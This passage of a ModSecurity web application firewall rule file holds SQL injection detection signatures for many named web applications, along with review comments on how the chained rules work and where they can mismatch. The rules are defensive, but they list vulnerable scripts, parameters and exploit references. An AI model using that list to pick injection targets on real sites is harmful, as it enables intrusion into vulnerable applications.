UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3469'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X-Ice News System SQL Injection Attempt -- devami.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005122) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php id UPDATE SecRule REQUEST_LINE "@contains /classes/class.news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005122,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0395'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005128) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php from UPDATE SecRule REQUEST_LINE "@contains /classes/class.news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005128,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php from UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0395'" SecRule &TX:'/SQL_INJECTION.*ARGS:from/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php from 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005134) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php q UPDATE SecRule REQUEST_LINE "@contains /classes/class.news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005134,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php q UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0395'" SecRule &TX:'/SQL_INJECTION.*ARGS:q/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X-dev xNews SQL Injection Attempt -- class.news.php q UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004862) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS XLAtunes SQL Injection Attempt -- view.php album UPDATE SecRule REQUEST_LINE "@contains /view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004862,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS XLAtunes SQL Injection Attempt -- view.php album UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3327'" SecRule &TX:'/SQL_INJECTION.*ARGS:album/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS XLAtunes SQL Injection Attempt -- view.php album UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005383) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- group.php id UPDATE SecRule REQUEST_LINE "@contains /kernel/group.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005383,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- group.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22399'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- group.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005389) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- table_broken.php lid UPDATE SecRule REQUEST_LINE "@contains /class/table_broken.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005389,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- table_broken.php lid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22399'" SecRule &TX:'/SQL_INJECTION.*ARGS:lid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- table_broken.php lid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006491) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- print.php id UPDATE SecRule REQUEST_LINE "@contains /print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006491,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- print.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3588'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Xoops SQL Injection Attempt -- print.php id 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006218) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Xt-News SQL Injection Attempt -- show_news.php id_news UPDATE SecRule REQUEST_LINE "@contains /show_news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006218,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Xt-News SQL Injection Attempt -- show_news.php id_news UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21719'" SecRule &TX:'/SQL_INJECTION.*ARGS:id_news/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Xt-News SQL Injection Attempt -- show_news.php id_news UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005614) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Xtreme ASP Photo Gallery SQL Injection Attempt -- displaypic.asp sortorder UPDATE SecRule REQUEST_LINE "@contains /displaypic.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005614,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Xtreme ASP Photo Gallery SQL Injection Attempt -- displaypic.asp sortorder UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21138'" SecRule &TX:'/SQL_INJECTION.*ARGS:sortorder/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Xtreme ASP Photo Gallery SQL Injection Attempt -- displaypic.asp sortorder UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004808) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) SQL Injection Attempt -- functions.php id UPDATE 
# ---------------------------------------------------------------------------
# Review notes. Layout is restored to one directive per line; the directive
# text itself is unchanged. The first rule below (2004808) has its header
# comment on the line before this block.
#
# Every signature in this block is a ModSecurity chain:
#   1. The starter matches a script path as a case-sensitive substring of
#      REQUEST_LINE (after t:urlDecodeUni, t:htmlEntityDecode and
#      t:normalisePathWin) and carries the metadata: id, rev, msg,
#      severity:'2', a reference tag, and the `block` action.
#   2. The chained rule is one of two conditions:
#        a. &TX:'/SQL_INJECTION.*ARGS:<param>/' "@gt 0" - counts TX variables
#           whose name matches the regex, so it is only true when an earlier
#           rule has already stored such a variable.
#           NOTE(review): presumably those variables come from the generic
#           SQL injection rules - confirm this file is loaded after them.
#        b. QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" - a case-insensitive
#           pattern over the whole query string or body, not one parameter.
#           It lists no t: actions of its own. NOTE(review): confirm which
#           transformations apply to it.
#   3. On a full match the chain adds audit log part E, sets tx.msg, adds
#      tx.critical_anomaly_score to tx.anomaly_score and stores the matched
#      value under tx.<rule id>-WEB_ATTACK/SQL_INJECTION-<variable name>.
#
# Points to check when tuning or triaging:
#   * Form (a) does not test for the UPDATE keyword that msg names, so the
#     alert title is more specific than the condition that fired.
#   * The regex in form (a) has no end anchor: ARGS:id also matches any
#     parameter name that merely begins with `id`, so a generic hit on
#     another parameter can be attributed to the wrong signature. Consider
#     ending the pattern with `$`.
#   * The starter operand is matched anywhere in the request line; a name
#     like /functions.php is not specific to the application named in msg.
#   * Matching is case-sensitive as written (no t:lowercase), including the
#     mixed-case operands /faqDsp.asp and /SelGruFra.asp.
#     NOTE(review): confirm that suits hosts that serve paths
#     case-insensitively.
#   * `block` defers the disruptive action to the configured default, so
#     whether a match denies or only scores depends on the deployment.
# ---------------------------------------------------------------------------
SecRule REQUEST_LINE "@contains /functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004808,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) SQL Injection Attempt -- functions.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22685'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) SQL Injection Attempt -- functions.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005197) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp id UPDATE
SecRule REQUEST_LINE "@contains /mezungiris.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005197,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469710/100/0/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005203) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp pass UPDATE
SecRule REQUEST_LINE "@contains /mezungiris.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005203,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp pass UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469710/100/0/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- mezungiris.asp pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005209) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp pass UPDATE
SecRule REQUEST_LINE "@contains /ogretmenkontrol.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005209,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp pass UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469710/100/0/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:pass/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp pass UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005215) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp id UPDATE
SecRule REQUEST_LINE "@contains /ogretmenkontrol.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005215,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469710/100/0/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zindizayn Okul Web Sistemi SQL Injection Attempt -- ogretmenkontrol.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2003986) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Zomplog SQL Injection Attempt -- mp3playlist.php speler UPDATE
SecRule REQUEST_LINE "@contains /plugins/mp3playlist/mp3playlist.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003986,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Zomplog SQL Injection Attempt -- mp3playlist.php speler UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3955'"
SecRule &TX:'/SQL_INJECTION.*ARGS:speler/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Zomplog SQL Injection Attempt -- mp3playlist.php speler UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005984) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS aFAQ SQL Injection Attempt -- faqDsp.asp catcode UPDATE
SecRule REQUEST_LINE "@contains /faqDsp.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005984,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS aFAQ SQL Injection Attempt -- faqDsp.asp catcode UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3031'"
SecRule &TX:'/SQL_INJECTION.*ARGS:catcode/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS aFAQ SQL Injection Attempt -- faqDsp.asp catcode UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005329) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS bbPress SQL Injection Attempt -- formatting-functions.php UPDATE
SecRule REQUEST_LINE "@contains /bb-includes/formatting-functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005329,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS bbPress SQL Injection Attempt -- formatting-functions.php UPDATE',tag:'web-application-attack',tag:'cve,CVE-2007-3244'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS bbPress SQL Injection Attempt -- formatting-functions.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005771) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS bitweaver SQL Injection Attempt -- edition.php tk UPDATE
SecRule REQUEST_LINE "@contains /newsletters/edition.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005771,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS bitweaver SQL Injection Attempt -- edition.php tk UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20996'"
SecRule &TX:'/SQL_INJECTION.*ARGS:tk/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS bitweaver SQL Injection Attempt -- edition.php tk UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006176) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtUse UPDATE
# Only the chain starter of rule 2006176 is inside this block; its chained
# condition is the first directive on the next line of the file.
SecRule REQUEST_LINE "@contains /SelGruFra.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006176,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtUse UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21732'"
# Chained condition of rule 2006176; its chain starter is the last directive
# before this block.
SecRule &TX:'/SQL_INJECTION.*ARGS:txtUse/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtUse UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# ---------------------------------------------------------------------------
# Review notes. Layout is restored to one directive per line; the directive
# text itself is unchanged.
#
# Every signature in this block is a two-rule ModSecurity chain:
#   1. The starter matches a script path as a case-sensitive substring of
#      REQUEST_LINE (after t:urlDecodeUni, t:htmlEntityDecode and
#      t:normalisePathWin) and carries the metadata: id, rev, msg,
#      severity:'2', a reference tag, and the `block` action.
#   2. The chained rule, &TX:'/SQL_INJECTION.*ARGS:<param>/' "@gt 0", counts
#      TX variables whose name matches the regex, so it is only true when an
#      earlier rule has already stored such a variable.
#      NOTE(review): presumably those variables come from the generic SQL
#      injection rules - confirm this file is loaded after them.
#   3. On a full match the chain adds audit log part E, sets tx.msg, adds
#      tx.critical_anomaly_score to tx.anomaly_score and stores the matched
#      value under tx.<rule id>-WEB_ATTACK/SQL_INJECTION-<variable name>.
#
# Points to check when tuning or triaging:
#   * The chained rule does not test for the UPDATE keyword that msg names,
#     so the alert title is more specific than the condition that fired.
#   * The regex has no end anchor, so a name such as ARGS:id_category also
#     matches any longer parameter name that begins with it. Consider ending
#     the pattern with `$`.
#   * The starter operand is matched anywhere in the request line, and names
#     like /index.php, /news.php or /category.php are not specific to the
#     application named in msg. Expect matches on unrelated software.
#   * Rules 2006956, 2006962 and 2006968 share the /index.php starter and
#     differ only in the parameter. A request with generic hits on several
#     of those parameters adds tx.critical_anomaly_score once per rule.
#   * Matching is case-sensitive as written (no t:lowercase).
#     NOTE(review): confirm that suits hosts that serve paths
#     case-insensitively, e.g. the .asp target.
#   * `block` defers the disruptive action to the configured default, so
#     whether a match denies or only scores depends on the deployment.
# ---------------------------------------------------------------------------

# (2006182) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtPas UPDATE
SecRule REQUEST_LINE "@contains /SelGruFra.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006182,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtPas UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21732'"
SecRule &TX:'/SQL_INJECTION.*ARGS:txtPas/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS chatwm SQL Injection Attempt -- SelGruFra.asp txtPas UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004058) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- category.php id_category UPDATE
SecRule REQUEST_LINE "@contains /category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004058,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- category.php id_category UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3981'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id_category/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- category.php id_category UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004106) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- manufacturer.php id_manufacturer UPDATE
SecRule REQUEST_LINE "@contains /manufacturer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004106,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- manufacturer.php id_manufacturer UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24223'"
SecRule &TX:'/SQL_INJECTION.*ARGS:id_manufacturer/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS cpCommerce SQL Injection Attempt -- manufacturer.php id_manufacturer UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005038) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dB Masters Curium CMS SQL Injection Attempt -- news.php c_id UPDATE
SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005038,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dB Masters Curium CMS SQL Injection Attempt -- news.php c_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3256'"
SecRule &TX:'/SQL_INJECTION.*ARGS:c_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dB Masters Curium CMS SQL Injection Attempt -- news.php c_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006956) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php seite_id UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006956,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php seite_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21170'"
SecRule &TX:'/SQL_INJECTION.*ARGS:seite_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php seite_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006962) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php gruppe_id UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006962,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php gruppe_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21170'"
SecRule &TX:'/SQL_INJECTION.*ARGS:gruppe_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php gruppe_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006968) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php go_target UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006968,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php go_target UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21170'"
SecRule &TX:'/SQL_INJECTION.*ARGS:go_target/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS dev4u CMS SQL Injection Attempt -- index.php go_target UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006620)
